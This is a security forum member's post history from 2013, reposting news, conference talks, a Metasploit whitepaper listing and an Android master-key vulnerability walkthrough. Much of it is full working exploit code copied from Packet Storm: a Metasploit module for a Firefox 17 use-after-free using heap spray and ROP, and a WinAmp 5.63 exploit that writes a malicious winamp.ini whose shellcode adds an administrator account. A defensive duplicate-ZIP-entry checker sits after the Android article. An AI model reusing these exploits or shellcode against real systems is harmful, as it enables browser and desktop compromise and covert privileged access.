Nytro - Posts: 18725 - Days Won: 706

Everything posted by Nytro
-
Yes, a couple more things could be made configurable:
1. The interval at which it checks for new posts
2. The timeout for that popup
Nice work.
-
Yes, too bad it's written in Ruby.
-
Metasploit - The Exploit Learning Tree
Author: Mohan Santokhi

This is a whitepaper called Metasploit - The Exploit Learning Tree. Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and try to decipher how the various classes and modules hang together to produce the various functions.

References
1. /documentation/developers_guide.pdf
2. http://dev.metasploit.com/documents/meterpreter.pdf
3. external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf
4. www.nologin.org/Downloads/Papers/remote-library-injection.pdf
5. www.nologin.org/Downloads/Papers/win32-shellcode.pdf
6. Metasploit Unleashed
7. http://www.securitytube.net/groups?operation=view&groupId=10

Table of Contents
1 Document Control
  1.1 Document Block
  1.2 Change History
  1.3 References
2 Table of Contents
3 Introduction
4 Setup
  4.1 Getting started
  4.2 Install Missing Gems
  4.3 Test the environment
5 Exploit Metamodel
6 Vulnerable Service
7 msfconsole Initialisation Phase
8 Use command
9 Set command
10 Exploit command
  10.1 Create Payload Objects
  10.2 Generate Encoded Payload
  10.3 Start handler
  10.4 Exploit The Target
  10.5 Establish Session
  10.6 Interact With Target
11 Meterpreter
  11.1 Meterpreter payloads
  11.2 Client components
    11.2.1 UI components
    11.2.2 Command proxy components
  11.3 Meterpreter Protocol
    11.3.1 Client side protocol API
    11.3.2 Server side protocol API
  11.4 Server components
  11.5 Server extensions
12 Writing Meterpreter Extensions
  12.1 Design commands, requests and responses
  12.2 Implement skeleton extension
  12.3 Implement command dispatcher class
  12.4 Implement command proxy class
13 Railgun
  13.1 Meterpreter scripts

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf
Source: Metasploit - The Exploit Learning Tree ≈ Packet Storm
-
The Future is Here: C++ 11
Published on 28.08.2013
Special Guest Lecture by C++ Inventor Bjarne Stroustrup
-
Microsoft triples SkyDrive Pro storage to 25GB per user
Nytro replied to Matt's topic in Stiri securitate
Older accounts, like mine, already had 25 GB.
-
Visual Studio 2013 IDE
Posted: 16 hours ago By: Robert Green

In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including:
- Signing into the IDE to synchronize your settings [00:40]
- Notifications center [06:00]
- Improvements to overall look and feel [11:30]
- Auto brace completion [16:00]
- Enhanced scroll bar [18:45]
- Improved Navigate To experience [20:00]
- Peek Definition [22:00]
- CodeLenses [24:50]

Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9
-
From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS
Posted: 1 day ago By: Charles

This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy.

Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9
-
Hashcat Can Now Be Used to Crack 55-Character Passwords
August 28th, 2013, 11:38 GMT · By Eduard Kovacs

The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters.

A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it’s becoming easier for cybercriminals to crack the hashes.

The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be utilized to crack passwords that are longer than 15 characters.

The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was “by far one of the most requested features.”

“We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52,” Jens Steube, the lead Hashcat developer, wrote in the release notes.

Source: Hashcat Can Now Be Used to Crack 55-Character Passwords
-
Evading Internet Censorship

This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk:

Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters.

Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked.

Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware works and how to effectively defeat it.

Download: http://blanu.net/Dust.pdf
Source: https://www.schneier.com/blog/archives/2013/08/evading_interne.html
-
Firefox XMLSerializer Use After Free
Authored by regenrecht, juan vazquez | Site metasploit.com

This Metasploit module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This Metasploit module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox XMLSerializer Use After Free',
      'Description'    => %q{
          This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
        a use after free of an Element object, when using the serializeToStream method
        with a specially crafted OutputStream defining its own write function. This module
        has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'regenrecht',  # Vulnerability Discovery, Analysis and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-0753' ],
          [ 'OSVDB', '89021'],
          [ 'BID', '57209'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ],
          [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ],
          [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'       => 'process',
          'PrependMigrate' => true
        },
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'DisableNops' => true,
          'Space'       => 30000 # Indeed a sprayed chunk, just a high value where any payload fits
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Firefox 17 / Windows XP SP3',
            {
              'FakeObject'   => 0x0c101008, # Pointer to the Sprayed Memory
              'FakeVFTable'  => 0x0c10100c, # Pointer to the Sprayed Memory
              'RetGadget'    => 0x77c3ee16, # ret from msvcrt
              'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt
              'StackPivot'   => 0x77c15ed5, # xchg eax,esp # ret msvcrt
            }
          ]
        ],
      'DisclosureDate' => 'Jan 08 2013',
      'DefaultTarget'  => 0))
  end

  def stack_pivot
    pivot = "\x64\xa1\x18\x00\x00\x00"    # mov eax, fs:[0x18]  # get teb
    pivot << "\x83\xC0\x08"               # add eax, byte 8     # get pointer to stacklimit
    pivot << "\x8b\x20"                   # mov esp, [eax]      # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000      # plus a little offset
    return pivot
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_status("Agent: #{agent}")

    if agent !~ /Windows NT 5\.1/
      print_error("Windows XP not found, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    unless agent =~ /Firefox\/17/
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    # Fake object landed on 0x0c101008 if heap spray is working as expected
    code = [
      target['FakeVFTable'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['RetGadget'],
      target['PopRetGadget'],
      0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis
    ].pack("V*")
    code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer)
    code << [target['PopRetGadget']].pack("V")    # pop # ret
    code << [target['StackPivot']].pack("V")      # stackpivot # xchg eax # esp # ret
    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})

    js_code   = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
    js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
    js_ptr    = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch))

    content = <<-HTML
<html>
<script>
var heap_chunks;

function heapSpray(shellcode, fillsled) {
  var chunk_size, headersize, fillsled_len, code;
  var i, codewithnum;
  chunk_size = 0x40000;
  headersize = 0x10;
  fillsled_len = chunk_size - (headersize + shellcode.length);
  while (fillsled.length < fillsled_len)
    fillsled += fillsled;
  fillsled = fillsled.substring(0, fillsled_len);
  code = shellcode + fillsled;
  heap_chunks = new Array();
  for (i = 0; i < 1000; i++) {
    codewithnum = "HERE" + code;
    heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
  }
}

function gen(len, pad) {
  pad = unescape(pad);
  while (pad.length < len/2)
    pad += pad;
  return pad.substring(0, len/2-1);
}

function run() {
  var container = [];
  var myshellcode = unescape("#{js_code}");
  var myfillsled = unescape("#{js_random}");
  heapSpray(myshellcode, myfillsled);

  var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" +
             "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}";
  var small = gen(72, fake);

  var text = 'x';
  while (text.length <= 1024)
    text += text;

  var parent = document.createElement("parent");
  var child = document.createElement("child");
  parent.appendChild(child);
  child.setAttribute("foo", text);

  var s = new XMLSerializer();
  var stream = {
    write: function() {
      parent.removeChild(child);
      child = null;
      for (i = 0; i < 2097152; ++i)
        container.push(small.toLowerCase());
    }
  };
  s.serializeToStream(parent, stream, "UTF-8");
}
</script>
<body onload="run();">
</body>
</html>
    HTML

    print_status("URI #{request.uri} requested...")
    print_status("Sending HTML")
    send_response(cli, content, {'Content-Type'=>'text/html'})
  end

end

Source: Firefox XMLSerializer Use After Free ≈ Packet Storm
-
Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Description: Remember that scene in Hackers where Jonny Lee Miller and Angelina Jolie get a bunch of hackers to attack Fisher Steven's network through vulnerabilities that they find while flying (literally) through Fisher's network? Even though it had no basis in reality at the time, it was still pretty awesome. This presentation will be like that, except real.

This highly demo-focused presentation will unleash the next generation of web application visualization and security flaw detection. Created as part of DARPA's Cyber Fast Track, we have developed a completely awesome way of visualizing, in 3D, how massive numbers of web applications across the Internet are interconnected. This visualization engine provides a simple yet beautiful view of web applications and their vast, sprawling interconnections, all the while incorporating web application vulnerabilities into the visual metadata.

Teal Rogers is a dedicated maker and software designer who has been advancing existing products through innovative new interfaces for years. Between being a brilliant imagineer, rogue inventor, warrior-poet, master of surprise, and student of the arcane he has managed to design and sell the highest quality laser gloves on the market. More recently, he has been inexorably drawn to the nascent power of the 3rd dimension.

Alejandro Caceres is a computer network operations engineer focused on network offense software development and web application penetration testing and security. He is particularly interested in using distributed computing and offensive security principles to create cool/new/revolutionary open source and free applications with a global impact.

Source: Defcon 2013 - The Dawn Of Web 3.0: Website Mapping And Vulnerability Scanning In 3d, Just Like You Saw In The Movies

Kewl stuff
-
Kali Linux - Backdooring Windows 8
https://www.youtube.com/watch?feature=player_embedded&v=tlQf8VJgy70

Description: In this video you will learn how to exploit Windows 8 using the Metasploit Framework and how you can maintain your access on Windows 8 using Kali Linux and Metasploit.

Source: Kali Linux - Backdooring Windows 8
-
Gps Hacking

Description: GPS Hacking
For more information please visit: Bsides Las Vegas 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) BSidesLV

Source: Gps Hacking
-
Windows Universal Privilege Escalation Exploit

Description: Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit demo

Skiddie stuff, but possibly useful/necessary.

Source: Windows Universal Privilege Escalation Exploit
-
Android Master Key Vulnerability—PoC
Rohit T, August 28, 2013

The recently discovered master key vulnerability in Android has given a jolt to the Android team and other parties involved. This vulnerability allows attackers to inject malicious code into legitimate Android applications without invalidating the digital signature. It’s very easy for hackers and attackers to take advantage of this vulnerability and exploit it. The news is already out that there are apps currently on the market that are exploiting this vulnerability. This was revealed at the recent Black Hat Conference 2013, although some researchers were able to publish the news a week before. So let’s look into what the issue is, how hackers can exploit it, and what needs to be done to fix it.

How Does Android Code Signing Work?

Android applications are .APK files (Android Packages), which are nothing but a collection of ZIP archives. For easy understanding, let us open up an APK file for an application and find out the same. Consider the application MyFirstApp.apk, which is signed by my certificate. Let us talk a little bit more about this signing process before we go ahead and understand the underlying issue.

Android requires that all installed applications be digitally signed with a certificate whose private key is held by the application’s developer. Why would you want to sign the piece of code? For two reasons basically—authenticity and integrity. Before installing any application, I want to make sure that the application isn’t tampered with (integrity checking) and that it was created by the right person (authenticity checking). The Android system uses the certificate as a means of identifying the author of an application and establishing trust relationships between applications. The Android system will not install or run an application that is not signed. So, after building an application and signing it with a certificate, you basically have an APK file at the end.

(Figure: MyFirstApp.apk)

MyFirstApp.apk is a simple application (just a random application) and looks like this when installed on the emulator. APK files are nothing but a collection of zip files. So if you rename an .apk extension as .zip you will be able to see the contents of the file. As you can see, the APK file consists of a subdirectory called META-INF, which contains signed checksums for all the other files in the package. The main manifest file (MANIFEST.MF) has entries with the file name and digest-value of each file in the archive.

Now, if you modify any of the files in this package, Android will block the installation of the package to prevent the users from harmful activities. Android does this by verifying the checksum. In order to verify the checksum of each of these files, Android has to extract each of these files from the APK archive. This is accomplished using the Java unzipping library, which will parse the ZIP-format APK file, extract each file object, and match it up with the corresponding checksum mentioned in the manifest file in META-INF.

Now try to modify any of these files; for example, modify the launch image file inside the MyFirstApp.zip\res\drawable-hdpi folder, rebuild it, and try to install it on the device using adb, and you will find that Android rightly notices it and shows this message:

How Is the Attack Accomplished?

The vulnerability is based on the exploitation of the way in which Android verifies and installs the application. This helps in inserting code into the application without modifying the cryptographic signature. The attack successfully bypasses this verification process and installs the application with any changes the hacker embeds in the code.

The attack is based on the concept of placing two different files in the APK archive with the same name. Regular ZIP software generally does not allow you to have two files with the same name in one archive. But the ZIP format itself doesn’t prevent duplicated filenames, and you can take advantage of this to create an archive with repeated file names as shown below.

The ic_launcher.png file is something that I have added to the existing file and created a new APK file named HackedFile.zip. Now rename this file to HackedFile.apk and try to install it; you will observe that Android accepts it this time. It runs successfully without any complaints. Note that I was able to replace the launch image successfully without using any certificate and Android happily accepts the same.

How Is This Even Possible?

This is possible because Android verifies the first version of any file in the archive but the installer verifies and extracts the last version of the file. Thus the legitimate file is checked by the cryptographic verifier and the one added by the hacker is installed by the installer. In simple words, what gets installed is a fake but what gets verified for signature is the legitimate part.

What Are the Implications?

The implications are huge. The most important thing to note is that almost all versions of Android are vulnerable to this attack. The impact of this vulnerability and its exploitation is only limited by the imagination of a hacker. For instance, he can spy on your communication or he can go a step further and send premium rate SMS without the user’s knowledge, make background calls, take pictures and forward them to mail, etc. Some of the built-in apps that come along with the phone have higher privileges than the other applications which are installed from the Play Store, so an attacker can take advantage of this and create apps that have system-level privileges. A Trojan application that is installed from a device application can access the entire Android system and their applications and their data. As explained by Jeff Forristal, an attacker can then create a botnet with the always-internet-connected mobile phones.

The Bluebox team has successfully demonstrated this and changed the name of the kernel, etc. Symantec researchers have already discovered that the bug is being exploited in the wild by attackers by publishing popular games in third-party sites. Google has already released patches for this but, as everyone knows, it will certainly take some time for the handset makers to update all of their models. Google is now verifying all the applications in the Play Store to check for the master key vulnerability. But the other third-party stores and the side loading of apps aren’t going to help the cause.

What Precautions Could Help Users to Stay Away from This?

It’s important to download the apps only from the Google Play Store and, even while downloading from the Play Store, make sure that you verify the author of the application before downloading it. Do not install applications from untrusted sources or other Android stores. Similarly, say “No” to side loading of applications. In short, make sure you identify the publisher of the application before you install one. Google has already rolled out patches for this. Make sure you update your mobile with the latest patches available. Apart from these, an application also released in the Play Store, “Blue Box Security Scanner,” will scan your device and let you know whether it is vulnerable to this Android master key vulnerability. Here is one screenshot of the program.

Video

Here is the video link that practically demonstrates how this can be accomplished:

Source: Android Master Key Vulnerability—PoC
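A check for the condition the article describes, added here as an example and not part of the article, of Android, or of the Bluebox scanner: it walks every central-directory entry of an APK-like ZIP and reports names that occur more than once, together with what the first occurrence (what a verifier that hashes "the first version" sees) and the last occurrence (what an installer that keeps "the last version" extracts) contain. The sample archive is constructed in memory with a duplicated ic_launcher.png, and the META-INF entry is a stand-in, not a real signature; the function names are this example's own.

```python
import io
import warnings
import zipfile
from collections import defaultdict

ICON = "res/drawable-hdpi/ic_launcher.png"


def build_sample_apk(duplicate_icon: bool) -> bytes:
    """Constructed sample: an APK-like ZIP. With duplicate_icon=True a second
    entry named ICON is appended, the archive shape the article describes.
    The META-INF content is a placeholder, not a real signed manifest."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr(ICON, b"ORIGINAL-ICON")  # the entry the signature would cover
        zf.writestr("META-INF/MANIFEST.MF", b"Name: " + ICON.encode() + b"\n")
        if duplicate_icon:
            with warnings.catch_warnings():
                # zipfile warns about the duplicate name but still writes the entry,
                # which is exactly why the ZIP format permits this archive
                warnings.simplefilter("ignore", UserWarning)
                zf.writestr(ICON, b"REPLACED-ICON")  # the entry a "last wins" extractor uses
    return buf.getvalue()


def find_duplicate_entries(apk_bytes: bytes) -> dict:
    """Map each name that appears more than once in the central directory to the
    contents of every occurrence, in directory order. infolist() keeps all
    entries; name-based access (zf.read(name)) silently resolves to the last."""
    occurrences = defaultdict(list)
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            with zf.open(info) as fh:  # open by ZipInfo so each occurrence is read individually
                occurrences[info.filename].append(fh.read())
    return {name: blobs for name, blobs in occurrences.items() if len(blobs) > 1}


def is_safe_to_install(apk_bytes: bytes) -> bool:
    """Reject any archive in which verified (first) and extracted (last) content can differ."""
    return not find_duplicate_entries(apk_bytes)


def report(apk_bytes: bytes) -> list:
    """One human-readable line per duplicated entry."""
    lines = []
    for name, blobs in find_duplicate_entries(apk_bytes).items():
        lines.append(
            f"{name}: {len(blobs)} entries; first (verified) = {blobs[0]!r}, "
            f"last (extracted) = {blobs[-1]!r}"
        )
    return lines


if __name__ == "__main__":
    for flag in (False, True):
        apk = build_sample_apk(flag)
        print(f"duplicate_icon={flag} -> safe to install: {is_safe_to_install(apk)}")
        for line in report(apk):
            print("  ", line)
```

The point of reading by ZipInfo rather than by name is that a name lookup hides the problem: the library resolves the name to one entry and the other is never seen, which is the same blind spot the article attributes to the verifier and the installer disagreeing on which copy counts.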
-
WinAmp 5.63 (winamp.ini) - Local Exploit

# Exploit Title: winampevilskin.py
# Date: 25 August 2013
# Exploit Author: Ayman Sagy <aymansagy@gmail.com>
# Vendor Homepage: http://www.winamp.com/
# Version: 5.63
# Tested on: Windows XP Professional SP3 Version 2002
# CVE : 2013-4694
#
# Ayman Sagy <aymansagy@gmail.com> August 2013
#
# This is an exploit for Bug #1 described in http://www.exploit-db.com/exploits/26558/
# Credit for discovering the vulnerability goes to Julien Ahrens from Inshell Security
#
# The exploit will generate a winamp.ini file that will cause winamp to run the payload upon startup
#
#
# I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work, it wrote an invalid address on the stack then tried to access it
# If you can make it work or find a solution for ASLR/DEP please contact me
#
# So I wrote from scratch a venetian shellcode that will write the egghunter onto the stack then executes it
# The egg and shellcode can be found in plain ASCII in memory
#
# Tested against Windows XP Pro SP3
# Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
# run with Python 2.7

import sys, getopt, os

def usage():
    print('winampevilskin.py by Ayman Sagy <aymansagy@gmail.com>\n')
    print('Usage: python ' + sys.argv[0] + ' -p <payload>')
    print('Payload could be:')
    print('\t[user] to create new admin account ayman/P@ssw0rd')
    print('\t[calc] run calculator')
    print('for e.g.: python ' + sys.argv[0] + ' -p user')

#appdata = os.environ['APPDATA']

# Windows add admin user: ayman P@ssw0rd
scadduser = (
    b"\xbf\xab\xd0\x9a\x5b\xda\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9" +
    "\xb1\x45\x83\xc2\x04\x31\x7a\x11\x03\x7a\x11\xe2\x5e\x2c" +
    "\x72\xd2\xa0\xcd\x83\x85\x29\x28\xb2\x97\x4d\x38\xe7\x27" +
    "\x06\x6c\x04\xc3\x4a\x85\x9f\xa1\x42\xaa\x28\x0f\xb4\x85" +
    "\xa9\xa1\x78\x49\x69\xa3\x04\x90\xbe\x03\x35\x5b\xb3\x42" +
    "\x72\x86\x3c\x16\x2b\xcc\xef\x87\x58\x90\x33\xa9\x8e\x9e" +
    "\x0c\xd1\xab\x61\xf8\x6b\xb2\xb1\x51\xe7\xfc\x29\xd9\xaf" +
    "\xdc\x48\x0e\xac\x20\x02\x3b\x07\xd3\x95\xed\x59\x1c\xa4" +
    "\xd1\x36\x23\x08\xdc\x47\x64\xaf\x3f\x32\x9e\xd3\xc2\x45" +
    "\x65\xa9\x18\xc3\x7b\x09\xea\x73\x5f\xab\x3f\xe5\x14\xa7" +
    "\xf4\x61\x72\xa4\x0b\xa5\x09\xd0\x80\x48\xdd\x50\xd2\x6e" +
    "\xf9\x39\x80\x0f\x58\xe4\x67\x2f\xba\x40\xd7\x95\xb1\x63" +
    "\x0c\xaf\x98\xe9\xd3\x3d\xa7\x57\xd3\x3d\xa7\xf7\xbc\x0c" +
    "\x2c\x98\xbb\x90\xe7\xdc\x34\xdb\xa5\x75\xdd\x82\x3c\xc4" +
    "\x80\x34\xeb\x0b\xbd\xb6\x19\xf4\x3a\xa6\x68\xf1\x07\x60" +
    "\x81\x8b\x18\x05\xa5\x38\x18\x0c\xc6\xd3\x82\x81\x6d\x54" +
    "\x2e\xfe\x42\xc7\x90\x90\xf9\x73\xf1\x19\x72\x19\x83\xc1" +
    "\x15\x98\x0e\x63\xbb\x7a\x81\x23\x30\x08\x56\x94\xc4\x8a" +
    "\xb8\xfb\x69\x17\xfd\x23\x4f\xb1\xdd\x4d\xea\xc9\x3d\xfe" +
    "\x9b\x52\x5f\x92\x04\xe7\xf0\x1f\xba\x27\x4e\x84\x57\x41" +
    "\x3e\x2d\xd4\xe5\xcc\xcc\x6e\x69\x43\x7c\xae\x14\xda\xef" +
    "\xcf\xb8\x3c\xdf\x4e\x01\x79\x1f" )

# http://shell-storm.org/shellcode/files/shellcode-739.php
sccalc = (b"\x31\xC9"+                  # xor ecx,ecx
          "\x51"+                       # push ecx
          "\x68\x63\x61\x6C\x63"+       # push 0x636c6163
          "\x54"+                       # push dword ptr esp
          "\xB8\xC7\x93\xC2\x77"+       # mov eax,0x77c293c7
          "\xFF\xD0" )

if len(sys.argv) < 2:
    usage()
    exit(1)

try:
    opts, args = getopt.getopt(sys.argv[1:],'p:')
except getopt.GetoptError:
    usage()
    exit(1)

for opt, arg in opts:
    if opt == '-p':
        if arg == 'user':
            shellcode = "aymnaymn" + "\x90" + "\x90" * 100 + scadduser + "\x90" * 89
        elif arg == "calc":
            shellcode = "aymnaymn" + b"\x90" * 452 + b"\x90" + sccalc + b"\x90" * 23
        else:
            print("Error: Invalid payload.\n")
            usage()
            sys.exit()

#print(str(len(shellcode)))

egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"+
             "\xef\xb8\x61\x79\x6d\x6e\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

sploit = (
    # Unicode-friendly venetian egghunter writer
    # Setup Registers
    "\x50\x72\x50"+           # push eax twice
    "\x72" +                  # align
    "\x59\x72\x5f"+           # pop ecx
                              # pop edi
    "\x72" +
    "\x05\xc2\x02\x01"+       # 05 00020001 ADD EAX,1000200
    "\x72"+
    "\x2d\xc2\x01\x01"+       # 2D 00010001 SUB EAX,1000100
    # EAX is now EAX+100
    "\x72\x48"+               # dec eax 4 times
    "\x72\x48"+
    "\x72\x48"+
    "\x72\x48\x72"+
    # Pave Ahead
    # write NOPs in locations that will stop later execution
    "\xc3\x86\xc2\x90"+       # C600 90 MOV BYTE PTR DS:[EAX],90
    "\x72\x40\x72"+           # 40 INC EAX
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x90"+
    "\x72\x40\x72"+
    "\xc2\x91"                # 91 XCHG EAX,ECX
    "\x72" +                  # align
    # Start writing egghunter shellcode, EGG = aymn
    "\xc3\x86\x66"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x81"+       #81
    "\x72\x40\x72"+
    "\xc3\x86\xc3\x8a"+       #ca
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xbf"+
    "\x72\x40\x72"+
    "\xc3\x86\x0f"+
    "\x72\x40\x72"+
    "\xc3\x86\x42"+           # 42
    "\x72\x40\x72"+
    "\xc3\x86\x52"+
    "\x72\x40\x72"+
    "\xc3\x86\x6a"+
    "\x72\x40\x72"+
    "\xc3\x86\x02"+
    "\x72\x40\x72"+
    "\x34" * 4 +              # Padding
    "\xc3\xb0\x30"+           # 0x003000F0 CALL EAX winamp.exe WinXP Pro SP3
    # Note: If you add winamp as an exception to DEP the return address becomes 0x003100F0 instead of 0x003000F0
    "\x72"
    "\xc3\x86\x58"+           #58
    "\x72\x40\x72"+
    "\xc3\x86\xc3\x8d"+       #cd
    "\x72\x40\x72"+
    "\xc3\x86\x2e"+           #2e
    "\x72\x40\x72"+
    "\xc3\x86\x3c"+           # 3c
    "\x72\x40\x72"+
    "\xc3\x86\x05"+           # 5
    "\x72\x40\x72"+
    "\xc3\x86\x5a"+
    "\x72\x40\x72"+
    "\xc3\x86\x74"+
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xaf"+       # ef
    "\x72\x40\x72"+
    "\xc3\x86\xc2\xb8"+
    "\x72\x40\x72"+
    "\xc3\x86\x61"+
    "\x72\x40\x72"+
    "\xc3\x86\x79"+
    "\x72\x40\x72"+
    "\xc3\x86\x6d"+
    "\x72\x40\x72"+
    "\xc3\x86\x6e"+
    "\x72\x40\x72"+
    "\xc3\x86\xc2\x8b"+
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xba"+       #fa
    "\x72\x40\x72"+
    "\xc3\x86\xc2\xaf"+       # af
    "\x72\x40\x72"+
    "\xc3\x86\x75"+           #75
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xaa"+       #ea
    "\x72\x40\x72"+
    "\xc3\x86\xc2\xaf"+       # af
    "\x72\x40\x72"+
    "\xc3\x86\x75"+           #75
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xa7"+       # e7
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xbf"+       # ff
    "\x72\x40\x72"+
    "\xc3\x86\xc3\xa7"+       # e7
    "\x72"+
    "\x57"+                   # 57 PUSH EDI
    "\x72"+                   # align
    "\xc3\x83"+               # C3 RETN
    "\x34" * 200              # Padding
    )

winamp = ("[Winamp]\r\nutf8=1\r\n" +
          "skin=" + sploit + "\r\n"
          "[WinampReg]\r\nIsFirstInst=0\r\nNeedReg=0\r\n" +
          "[in_wm]\r\nnumtypes=7\r\n" +
          "type0=WMA\r\ndescription0=Windows Media Audio File (*.WMA)\r\n" +
          "protocol0=0\r\navtype0=0\r\n" +
          "type1=WMV\r\ndescription1=Windows Media Video File (*.WMV)\r\n" +
          "protocol1=0\r\navtype1=1\r\ntype2=ASF\r\n" +
          "description2=Advanced Streaming Format (*.ASF)\r\n" +
          "protocol2=0\r\navtype2=1\r\ntype3=MMS://\r\n" +
          "description3=Windows Media Stream\r\nprotocol3=1\r\n" +
          "avtype3=1\r\ntype4=MMSU://\r\n"
          "description4=Windows Media Stream\r\nprotocol4=1\r\n" +
          "avtype4=1\r\ntype5=MMST://\r\n" +
          "description5=Windows Media Stream\r\nprotocol5=1\r\n" +
          "avtype5=1\r\ntype5=" + "\x90\x90\xe9\x0f" + "\r\ndescription6=" + shellcode +
          "\r\nprotocol6=0\r\navtype6=0\r\n")

#f = open(appdata + "\Winamp\winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f = open("winamp.ini", "wb") or sys.exit("Error creating winamp.ini")
f.write(winamp)
f.close()
print("winamp.ini written, copy it into %APPDATA%\\Winamp")

